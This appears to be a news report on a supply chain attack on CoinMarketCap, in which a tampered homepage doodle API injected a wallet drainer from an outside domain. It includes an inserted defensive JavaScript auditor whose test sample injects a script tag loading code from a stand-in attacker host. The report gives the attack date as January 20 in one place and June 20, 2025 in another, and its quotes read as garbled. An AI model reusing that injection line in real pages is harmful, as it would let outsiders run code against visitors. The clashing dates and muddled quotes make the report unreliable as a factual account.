CoinMarketCap, the popular cryptocurrency price tracking site, suffered a website supply chain attack that exposed site visitors to a wallet drainer campaign designed to steal their crypto.
On Friday evening, January 20, CoinMarketCap visitors started seeing Web3 popups asking them to connect their wallets to the site. However, when visitors connected their wallets, a malicious script drained the cryptocurrency from them.
The company later confirmed that the threat actors used a vulnerability in the site's homepage "doodle" image to inject malicious JavaScript into the site.
“On June 20, 2025, our security team identified a vulnerability related to a doodle image displayed on our homepage. This doodle image had a link that triggers malicious code through an API call, resulting in an unexpected popup for some users when our homepage is visited,” reads a statement posted on X.
“On the search, we worked immediately to remove the problematic material, identified the root cause, and comprehensive measures have been implemented to separate and reduce the issue.”
“We can confirm that all systems are now fully on, and CoinMarketCap is safe for all users.”
The cybersecurity firm c/side explained that the attack worked by the threat actors somehow modifying the API that the site uses for the doodle image on its homepage. The tampered JSON payload now included a malicious script tag that injected a wallet drainer script into CoinMarketCap from an external site called “static.cdnkit[.]io”.
When someone visited the page, the script would execute and display a fake wallet connect popup mimicking a legitimate Web3 transaction request. However, this script was actually a wallet drainer designed to steal the assets of connected wallets.
“This was a supply chain attack, meaning that the breach targeted not the servers of CMC, but third-party equipment or resources used by CMC,” c/side explains.
“It is difficult to detect such attacks because they exploit reliable elements of a platform.”
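One way to catch the injection path c/side describes is to audit an API's JSON payload before any of its strings reach the DOM. This is an added example, not code from CoinMarketCap or c/side; the payload field names, the allowlisted host and both sample payloads are constructed assumptions.

```javascript
// Added example: audit a JSON payload before any of its strings reach the DOM.
// Field names, hosts and sample payloads are constructed assumptions.
const ALLOWED_HOSTS = new Set(["static.example.com"]); // hypothetical first-party CDN

// Patterns for markup that can run code when a string is inserted as HTML.
const ACTIVE_MARKUP = [
  { name: "script-tag", re: /<\s*script\b/i },
  { name: "event-handler", re: /<[^>]+\son[a-z]+\s*=/i },
  { name: "javascript-url", re: /javascript\s*:/i },
];
const URL_RE = /(?:https?:)?\/\/([a-z0-9.-]+)/gi;

// Recursively walk the payload and return one finding per suspicious string.
function auditPayload(value, path = "$", findings = []) {
  if (typeof value === "string") {
    for (const { name, re } of ACTIVE_MARKUP) {
      if (re.test(value)) findings.push({ path, issue: name });
    }
    for (const m of value.matchAll(URL_RE)) {
      const host = m[1].toLowerCase();
      if (!ALLOWED_HOSTS.has(host)) findings.push({ path, issue: "unlisted-host", host });
    }
  } else if (Array.isArray(value)) {
    value.forEach((v, i) => auditPayload(v, `${path}[${i}]`, findings));
  } else if (value && typeof value === "object") {
    for (const [k, v] of Object.entries(value)) auditPayload(v, `${path}.${k}`, findings);
  }
  return findings;
}

// Constructed sample payloads: one clean, one carrying an injected script tag.
const cleanDoodle = { doodle: { image: "https://static.example.com/doodles/a.png", alt: "Anniversary" } };
const tamperedDoodle = {
  doodle: {
    image: "https://static.example.com/doodles/a.png",
    link: '"><script src="https://cdn.attacker.example/inject.js"></script>',
  },
};

// Render only when the audit is clean; otherwise log each finding and drop the widget.
function safeToRender(payload) {
  const findings = auditPayload(payload);
  findings.forEach((f) => console.warn("blocked doodle payload:", JSON.stringify(f)));
  return findings.length === 0;
}

console.log(safeToRender(cleanDoodle), safeToRender(tamperedDoodle));
```

A check like this complements, rather than replaces, a Content-Security-Policy `script-src` allowlist, which stops the browser from loading scripts from unlisted origins even if a tampered string slips through.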
More information about the attack came later from a threat actor known as Ray, who said that the attackers behind the CoinMarketCap supply chain attack shared a screenshot of the drainer panel on a Telegram channel.
The panel indicated that $43,266 was stolen from 110 victims as part of this supply chain attack, with the threat actors speaking in French on the Telegram channel.

Source: Ray
As the popularity of cryptocurrency has risen, so has the threat from wallet drainers, which are commonly used in attacks.
Unlike traditional phishing, these types of attacks are often promoted through social media posts, advertisements, spoofed sites, and malicious browser extensions that include malicious wallet-draining scripts.
Reports suggest that wallet drainers stole about $500 million in 2024 through attacks targeting more than 300,000 wallet addresses.
The problem has become so widespread that Mozilla introduced a new system to detect wallet drainers in browser add-ons recently uploaded to the add-on repository.